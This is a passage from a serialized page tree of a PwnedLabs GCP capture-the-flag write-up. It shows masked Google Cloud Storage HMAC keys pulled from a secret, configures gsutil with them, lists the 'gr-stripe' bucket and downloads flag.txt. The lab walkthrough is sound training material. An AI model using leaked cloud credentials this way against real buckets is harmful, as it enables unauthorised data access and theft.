--secret=payments",{"type":32,"tag":127,"props":4583,"children":4584},{"style":150},[4585],{"type":37,"value":4526},{"type":32,"tag":127,"props":4587,"children":4588},{"style":139},[4589],{"type":37,"value":3684},{"type":32,"tag":127,"props":4591,"children":4592},{"class":129,"line":987},[4593],{"type":32,"tag":127,"props":4594,"children":4595},{"style":134},[4596],{"type":37,"value":4597},"GOOG1E6CZ32****************************************\n",{"type":32,"tag":127,"props":4599,"children":4600},{"class":129,"line":1000},[4601],{"type":32,"tag":127,"props":4602,"children":4603},{"style":134},[4604],{"type":37,"value":4605},"Hh**************************************\n",{"type":32,"tag":46,"props":4607,"children":4608},{},[4609],{"type":37,"value":4610},"We can see that we have GCS keys. In the following section, we will detail what these keys are and how to use them.",{"type":32,"tag":39,"props":4612,"children":4614},{"id":4613},"gcs-hmac-keys-usage",[4615],{"type":37,"value":4616},"GCS HMAC keys usage",{"type":32,"tag":46,"props":4618,"children":4619},{},[4620],{"type":37,"value":4621},"HMAC (Hash-based Message Authentication Code) keys in Google Cloud Storage (GCS) are an authentication mechanism that allows applications to access GCS buckets using an HMAC-SHA256 cryptographic signature instead of OAuth2.",{"type":32,"tag":46,"props":4623,"children":4624},{},[4625],{"type":37,"value":4626},"It is often used for the following benefits:",{"type":32,"tag":238,"props":4628,"children":4629},{},[4630,4635,4640],{"type":32,"tag":242,"props":4631,"children":4632},{},[4633],{"type":37,"value":4634},"Compatible with AWS S3 SDKs and tools",{"type":32,"tag":242,"props":4636,"children":4637},{},[4638],{"type":37,"value":4639},"Useful for applications requiring authenticated REST access",{"type":32,"tag":242,"props":4641,"children":4642},{},[4643],{"type":37,"value":4644},"Allows access to GCS with tools that don't support 
OAuth",{"type":32,"tag":46,"props":4646,"children":4647},{},[4648,4650,4656,4658,4664,4666,4671,4673],{"type":37,"value":4649},"The keys used are arranged in two parts: an ",{"type":32,"tag":104,"props":4651,"children":4653},{"className":4652},[],[4654],{"type":37,"value":4655},"access_key",{"type":37,"value":4657}," and a ",{"type":32,"tag":104,"props":4659,"children":4661},{"className":4660},[],[4662],{"type":37,"value":4663},"secret_key",{"type":37,"value":4665},". The ",{"type":32,"tag":104,"props":4667,"children":4669},{"className":4668},[],[4670],{"type":37,"value":4655},{"type":37,"value":4672}," will have a very specific format, making it easy to recognize as it will begin with: ",{"type":32,"tag":104,"props":4674,"children":4676},{"className":4675},[],[4677],{"type":37,"value":4678},"GOOG....",{"type":32,"tag":46,"props":4680,"children":4681},{},[4682],{"type":37,"value":4683},"It is possible to use these keys with the gsutil command",{"type":32,"tag":113,"props":4685,"children":4686},{"lang":115},[4687],{"type":32,"tag":118,"props":4688,"children":4690},{"className":120,"code":4689,"language":115,"meta":7,"style":7},"$> gsutil config -a\nThis command will configure HMAC credentials, but gsutil will use\nOAuth2 credentials from the Cloud SDK by default. To make sure the\nHMAC credentials are used, run: \"gcloud config set\npass_credentials_to_gsutil false\".\n\nThis command will create a boto config file at /root/.boto containing\nyour credentials, based on your responses to the following questions.\nWhat is your google access key ID? GOOG1E6CZ32****************************************\nWhat is your google secret access key? 
Hh**************************************\n",[4691],{"type":32,"tag":104,"props":4692,"children":4693},{"__ignoreMap":7},[4694,4719,4770,4832,4868,4885,4892,4945,4996,5042],{"type":32,"tag":127,"props":4695,"children":4696},{"class":129,"line":130},[4697,4701,4705,4710,4714],{"type":32,"tag":127,"props":4698,"children":4699},{"style":134},[4700],{"type":37,"value":3650},{"type":32,"tag":127,"props":4702,"children":4703},{"style":322},[4704],{"type":37,"value":3655},{"type":32,"tag":127,"props":4706,"children":4707},{"style":139},[4708],{"type":37,"value":4709},"gsutil",{"type":32,"tag":127,"props":4711,"children":4712},{"style":139},[4713],{"type":37,"value":180},{"type":32,"tag":127,"props":4715,"children":4716},{"style":150},[4717],{"type":37,"value":4718}," -a\n",{"type":32,"tag":127,"props":4720,"children":4721},{"class":129,"line":361},[4722,4727,4732,4736,4741,4746,4751,4756,4761,4765],{"type":32,"tag":127,"props":4723,"children":4724},{"style":134},[4725],{"type":37,"value":4726},"This",{"type":32,"tag":127,"props":4728,"children":4729},{"style":139},[4730],{"type":37,"value":4731}," command",{"type":32,"tag":127,"props":4733,"children":4734},{"style":139},[4735],{"type":37,"value":3725},{"type":32,"tag":127,"props":4737,"children":4738},{"style":139},[4739],{"type":37,"value":4740}," configure",{"type":32,"tag":127,"props":4742,"children":4743},{"style":139},[4744],{"type":37,"value":4745}," HMAC",{"type":32,"tag":127,"props":4747,"children":4748},{"style":139},[4749],{"type":37,"value":4750}," credentials,",{"type":32,"tag":127,"props":4752,"children":4753},{"style":139},[4754],{"type":37,"value":4755}," but",{"type":32,"tag":127,"props":4757,"children":4758},{"style":139},[4759],{"type":37,"value":4760}," gsutil",{"type":32,"tag":127,"props":4762,"children":4763},{"style":139},[4764],{"type":37,"value":3725},{"type":32,"tag":127,"props":4766,"children":4767},{"style":139},[4768],{"type":37,"value":4769}," 
use\n",{"type":32,"tag":127,"props":4771,"children":4772},{"class":129,"line":402},[4773,4778,4783,4788,4793,4797,4802,4807,4812,4817,4822,4827],{"type":32,"tag":127,"props":4774,"children":4775},{"style":134},[4776],{"type":37,"value":4777},"OAuth2",{"type":32,"tag":127,"props":4779,"children":4780},{"style":139},[4781],{"type":37,"value":4782}," credentials",{"type":32,"tag":127,"props":4784,"children":4785},{"style":139},[4786],{"type":37,"value":4787}," from",{"type":32,"tag":127,"props":4789,"children":4790},{"style":139},[4791],{"type":37,"value":4792}," the",{"type":32,"tag":127,"props":4794,"children":4795},{"style":139},[4796],{"type":37,"value":3989},{"type":32,"tag":127,"props":4798,"children":4799},{"style":139},[4800],{"type":37,"value":4801}," SDK",{"type":32,"tag":127,"props":4803,"children":4804},{"style":139},[4805],{"type":37,"value":4806}," by",{"type":32,"tag":127,"props":4808,"children":4809},{"style":139},[4810],{"type":37,"value":4811}," default.",{"type":32,"tag":127,"props":4813,"children":4814},{"style":139},[4815],{"type":37,"value":4816}," To",{"type":32,"tag":127,"props":4818,"children":4819},{"style":139},[4820],{"type":37,"value":4821}," make",{"type":32,"tag":127,"props":4823,"children":4824},{"style":139},[4825],{"type":37,"value":4826}," sure",{"type":32,"tag":127,"props":4828,"children":4829},{"style":139},[4830],{"type":37,"value":4831}," the\n",{"type":32,"tag":127,"props":4833,"children":4834},{"class":129,"line":738},[4835,4840,4844,4849,4854,4859,4863],{"type":32,"tag":127,"props":4836,"children":4837},{"style":134},[4838],{"type":37,"value":4839},"HMAC",{"type":32,"tag":127,"props":4841,"children":4842},{"style":139},[4843],{"type":37,"value":4782},{"type":32,"tag":127,"props":4845,"children":4846},{"style":139},[4847],{"type":37,"value":4848}," are",{"type":32,"tag":127,"props":4850,"children":4851},{"style":139},[4852],{"type":37,"value":4853}," 
used,",{"type":32,"tag":127,"props":4855,"children":4856},{"style":139},[4857],{"type":37,"value":4858}," run:",{"type":32,"tag":127,"props":4860,"children":4861},{"style":675},[4862],{"type":37,"value":678},{"type":32,"tag":127,"props":4864,"children":4865},{"style":139},[4866],{"type":37,"value":4867},"gcloud config set\n",{"type":32,"tag":127,"props":4869,"children":4870},{"class":129,"line":764},[4871,4876,4880],{"type":32,"tag":127,"props":4872,"children":4873},{"style":139},[4874],{"type":37,"value":4875},"pass_credentials_to_gsutil false",{"type":32,"tag":127,"props":4877,"children":4878},{"style":675},[4879],{"type":37,"value":668},{"type":32,"tag":127,"props":4881,"children":4882},{"style":139},[4883],{"type":37,"value":4884},".\n",{"type":32,"tag":127,"props":4886,"children":4887},{"class":129,"line":803},[4888],{"type":32,"tag":127,"props":4889,"children":4890},{"emptyLinePlaceholder":895},[4891],{"type":37,"value":898},{"type":32,"tag":127,"props":4893,"children":4894},{"class":129,"line":838},[4895,4899,4903,4907,4912,4916,4921,4925,4930,4935,4940],{"type":32,"tag":127,"props":4896,"children":4897},{"style":134},[4898],{"type":37,"value":4726},{"type":32,"tag":127,"props":4900,"children":4901},{"style":139},[4902],{"type":37,"value":4731},{"type":32,"tag":127,"props":4904,"children":4905},{"style":139},[4906],{"type":37,"value":3725},{"type":32,"tag":127,"props":4908,"children":4909},{"style":139},[4910],{"type":37,"value":4911}," create",{"type":32,"tag":127,"props":4913,"children":4914},{"style":139},[4915],{"type":37,"value":3735},{"type":32,"tag":127,"props":4917,"children":4918},{"style":139},[4919],{"type":37,"value":4920}," boto",{"type":32,"tag":127,"props":4922,"children":4923},{"style":139},[4924],{"type":37,"value":180},{"type":32,"tag":127,"props":4926,"children":4927},{"style":139},[4928],{"type":37,"value":4929}," file",{"type":32,"tag":127,"props":4931,"children":4932},{"style":139},[4933],{"type":37,"value":4934}," 
at",{"type":32,"tag":127,"props":4936,"children":4937},{"style":139},[4938],{"type":37,"value":4939}," /root/.boto",{"type":32,"tag":127,"props":4941,"children":4942},{"style":139},[4943],{"type":37,"value":4944}," containing\n",{"type":32,"tag":127,"props":4946,"children":4947},{"class":129,"line":847},[4948,4953,4957,4962,4967,4972,4977,4982,4986,4991],{"type":32,"tag":127,"props":4949,"children":4950},{"style":134},[4951],{"type":37,"value":4952},"your",{"type":32,"tag":127,"props":4954,"children":4955},{"style":139},[4956],{"type":37,"value":4750},{"type":32,"tag":127,"props":4958,"children":4959},{"style":139},[4960],{"type":37,"value":4961}," based",{"type":32,"tag":127,"props":4963,"children":4964},{"style":139},[4965],{"type":37,"value":4966}," on",{"type":32,"tag":127,"props":4968,"children":4969},{"style":139},[4970],{"type":37,"value":4971}," your",{"type":32,"tag":127,"props":4973,"children":4974},{"style":139},[4975],{"type":37,"value":4976}," responses",{"type":32,"tag":127,"props":4978,"children":4979},{"style":139},[4980],{"type":37,"value":4981}," to",{"type":32,"tag":127,"props":4983,"children":4984},{"style":139},[4985],{"type":37,"value":4792},{"type":32,"tag":127,"props":4987,"children":4988},{"style":139},[4989],{"type":37,"value":4990}," following",{"type":32,"tag":127,"props":4992,"children":4993},{"style":139},[4994],{"type":37,"value":4995}," questions.\n",{"type":32,"tag":127,"props":4997,"children":4998},{"class":129,"line":975},[4999,5004,5009,5013,5018,5022,5027,5032,5037],{"type":32,"tag":127,"props":5000,"children":5001},{"style":134},[5002],{"type":37,"value":5003},"What",{"type":32,"tag":127,"props":5005,"children":5006},{"style":139},[5007],{"type":37,"value":5008}," is",{"type":32,"tag":127,"props":5010,"children":5011},{"style":139},[5012],{"type":37,"value":4971},{"type":32,"tag":127,"props":5014,"children":5015},{"style":139},[5016],{"type":37,"value":5017}," 
google",{"type":32,"tag":127,"props":5019,"children":5020},{"style":139},[5021],{"type":37,"value":4511},{"type":32,"tag":127,"props":5023,"children":5024},{"style":139},[5025],{"type":37,"value":5026}," key",{"type":32,"tag":127,"props":5028,"children":5029},{"style":139},[5030],{"type":37,"value":5031}," ID?",{"type":32,"tag":127,"props":5033,"children":5034},{"style":139},[5035],{"type":37,"value":5036}," GOOG1E6CZ32",{"type":32,"tag":127,"props":5038,"children":5039},{"style":150},[5040],{"type":37,"value":5041},"****************************************\n",{"type":32,"tag":127,"props":5043,"children":5044},{"class":129,"line":987},[5045,5049,5053,5057,5061,5066,5070,5075,5080],{"type":32,"tag":127,"props":5046,"children":5047},{"style":134},[5048],{"type":37,"value":5003},{"type":32,"tag":127,"props":5050,"children":5051},{"style":139},[5052],{"type":37,"value":5008},{"type":32,"tag":127,"props":5054,"children":5055},{"style":139},[5056],{"type":37,"value":4971},{"type":32,"tag":127,"props":5058,"children":5059},{"style":139},[5060],{"type":37,"value":5017},{"type":32,"tag":127,"props":5062,"children":5063},{"style":139},[5064],{"type":37,"value":5065}," secret",{"type":32,"tag":127,"props":5067,"children":5068},{"style":139},[5069],{"type":37,"value":4511},{"type":32,"tag":127,"props":5071,"children":5072},{"style":139},[5073],{"type":37,"value":5074}," key?",{"type":32,"tag":127,"props":5076,"children":5077},{"style":139},[5078],{"type":37,"value":5079}," Hh",{"type":32,"tag":127,"props":5081,"children":5082},{"style":150},[5083],{"type":37,"value":5084},"**************************************\n",{"type":32,"tag":46,"props":5086,"children":5087},{},[5088,5090],{"type":37,"value":5089},"Once the keys are imported, it is possible to list the contents of the bucket that was also in the secrets: 
",{"type":32,"tag":104,"props":5091,"children":5093},{"className":5092},[],[5094],{"type":37,"value":5095},"gr-stripe",{"type":32,"tag":113,"props":5097,"children":5098},{"lang":115},[5099],{"type":32,"tag":118,"props":5100,"children":5102},{"className":120,"code":5101,"language":115,"meta":7,"style":7},"$> gsutil ls -r gs://gr-stripe\ngs://gr-stripe/flag.txt\ngs://gr-stripe/transfer/:\ngs://gr-stripe/transfer/\ngs://gr-stripe/transfer/stripe-fetch.js\n",[5103],{"type":32,"tag":104,"props":5104,"children":5105},{"__ignoreMap":7},[5106,5135,5143,5151,5159],{"type":32,"tag":127,"props":5107,"children":5108},{"class":129,"line":130},[5109,5113,5117,5121,5126,5130],{"type":32,"tag":127,"props":5110,"children":5111},{"style":134},[5112],{"type":37,"value":3650},{"type":32,"tag":127,"props":5114,"children":5115},{"style":322},[5116],{"type":37,"value":3655},{"type":32,"tag":127,"props":5118,"children":5119},{"style":139},[5120],{"type":37,"value":4709},{"type":32,"tag":127,"props":5122,"children":5123},{"style":139},[5124],{"type":37,"value":5125}," ls",{"type":32,"tag":127,"props":5127,"children":5128},{"style":150},[5129],{"type":37,"value":2991},{"type":32,"tag":127,"props":5131,"children":5132},{"style":139},[5133],{"type":37,"value":5134}," 
gs://gr-stripe\n",{"type":32,"tag":127,"props":5136,"children":5137},{"class":129,"line":361},[5138],{"type":32,"tag":127,"props":5139,"children":5140},{"style":134},[5141],{"type":37,"value":5142},"gs://gr-stripe/flag.txt\n",{"type":32,"tag":127,"props":5144,"children":5145},{"class":129,"line":402},[5146],{"type":32,"tag":127,"props":5147,"children":5148},{"style":134},[5149],{"type":37,"value":5150},"gs://gr-stripe/transfer/:\n",{"type":32,"tag":127,"props":5152,"children":5153},{"class":129,"line":738},[5154],{"type":32,"tag":127,"props":5155,"children":5156},{"style":134},[5157],{"type":37,"value":5158},"gs://gr-stripe/transfer/\n",{"type":32,"tag":127,"props":5160,"children":5161},{"class":129,"line":764},[5162],{"type":32,"tag":127,"props":5163,"children":5164},{"style":134},[5165],{"type":37,"value":5166},"gs://gr-stripe/transfer/stripe-fetch.js\n",{"type":32,"tag":46,"props":5168,"children":5169},{},[5170,5172,5178],{"type":37,"value":5171},"We can see that we have a file called ",{"type":32,"tag":104,"props":5173,"children":5175},{"className":5174},[],[5176],{"type":37,"value":5177},"flag.txt",{"type":37,"value":5179}," in the bucket, so we can download it using the following command:",{"type":32,"tag":113,"props":5181,"children":5182},{"lang":115},[5183],{"type":32,"tag":118,"props":5184,"children":5186},{"className":120,"code":5185,"language":115,"meta":7,"style":7},"$> gsutil cp gs://gr-stripe/flag.txt 
.\n",[5187],{"type":32,"tag":104,"props":5188,"children":5189},{"__ignoreMap":7},[5190],{"type":32,"tag":127,"props":5191,"children":5192},{"class":129,"line":130},[5193,5197,5201,5205,5210,5215],{"type":32,"tag":127,"props":5194,"children":5195},{"style":134},[5196],{"type":37,"value":3650},{"type":32,"tag":127,"props":5198,"children":5199},{"style":322},[5200],{"type":37,"value":3655},{"type":32,"tag":127,"props":5202,"children":5203},{"style":139},[5204],{"type":37,"value":4709},{"type":32,"tag":127,"props":5206,"children":5207},{"style":139},[5208],{"type":37,"value":5209}," cp",{"type":32,"tag":127,"props":5211,"children":5212},{"style":139},[5213],{"type":37,"value":5214}," gs://gr-stripe/flag.txt",{"type":32,"tag":127,"props":5216,"children":5217},{"style":139},[5218],{"type":37,"value":5219}," .\n",{"type":32,"tag":46,"props":5221,"children":5222},{},[5223],{"type":37,"value":5224},"And there we have the flag :D",{"type":32,"tag":5226,"props":5227,"children":5228},"style",{},[5229],{"type":37,"value":5230},"html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}",{"title":7,"searchDepth":361,"depth":130,"links":5232},[5233,5234,5235,5236,5237,5238],{"id":41,"depth":361,"text":44},{"id":64,"depth":361,"text":67},{"id":447,"depth":361,"text":450},{"id":1809,"depth":361,"text":1812},{"id":2291,"depth":361,"text":2294},{"id":4613,"depth":361,"text":4616},"markdown","content:writeups:pwnedlabs-gcp-challenge.md","content","writeups/pwnedlabs-gcp-challenge.md","writeups/pwnedlabs-gcp-challenge","md",1749027224487]